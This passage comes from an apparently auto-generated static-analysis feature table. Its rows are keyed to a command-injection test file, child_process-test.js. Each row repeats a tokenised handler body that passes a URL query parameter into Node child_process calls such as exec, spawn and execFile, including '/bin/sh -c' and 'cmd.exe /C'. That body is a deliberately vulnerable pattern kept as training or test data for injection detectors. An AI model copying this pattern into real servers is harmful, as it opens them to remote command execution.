execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs = [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs = [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs = [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs = [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs = [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:15:59:16 | [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:15:59:16 | [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:15:59:16 | [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:15:59:16 | [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:15:59:16 | [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:10 | myArgs | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:10 | myArgs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:10 | myArgs | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:10 | myArgs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:10 | myArgs | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:15 | myArgs.push | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:15 | myArgs.push | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:15 | myArgs.push | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:15 | myArgs.push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:15 | myArgs.push | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | exceptional return of myArgs. ... + "c") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | exceptional return of myArgs. ... + "c") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | exceptional return of myArgs. ... + "c") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | exceptional return of myArgs. ... + "c") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | exceptional return of myArgs. ... + "c") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | myArgs. ... + "c") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | myArgs. ... + "c") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | myArgs. ... + "c") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | myArgs. ... + "c") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:5:60:26 | myArgs. ... + "c") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:12:60:15 | push | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:12:60:15 | push | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:12:60:15 | push | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:12:60:15 | push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:12:60:15 | push | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:19 | `-` | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:19 | `-` | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:19 | `-` | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:19 | `-` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:19 | `-` | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | CalleeFlexibleAccessPath | myArgs.push | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:17:60:25 | `-` + "c" | receiverName | myArgs | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:18:60:18 | - | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:18:60:18 | - | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:18:60:18 | - | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:18:60:18 | - | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:18:60:18 | - | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:18:60:18 | - | stringConcatenatedWith | -endpoint- 'c' | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:23:60:25 | "c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:23:60:25 | "c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:23:60:25 | "c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:23:60:25 | "c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:23:60:25 | "c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:60:23:60:25 | "c" | stringConcatenatedWith | '-' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:10 | myArgs | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:10 | myArgs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:10 | myArgs | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:10 | myArgs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:10 | myArgs | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:15 | myArgs.push | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:15 | myArgs.push | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:15 | myArgs.push | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:15 | myArgs.push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:15 | myArgs.push | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | exceptional return of myArgs.push(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | exceptional return of myArgs.push(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | exceptional return of myArgs.push(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | exceptional return of myArgs.push(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | exceptional return of myArgs.push(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | myArgs.push(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | myArgs.push(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | myArgs.push(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | myArgs.push(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:5:61:20 | myArgs.push(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:12:61:15 | push | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:12:61:15 | push | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:12:61:15 | push | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:12:61:15 | push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:12:61:15 | push | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | CalleeFlexibleAccessPath | myArgs.push | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:61:17:61:19 | cmd | receiverName | myArgs | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:62:5:62:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args 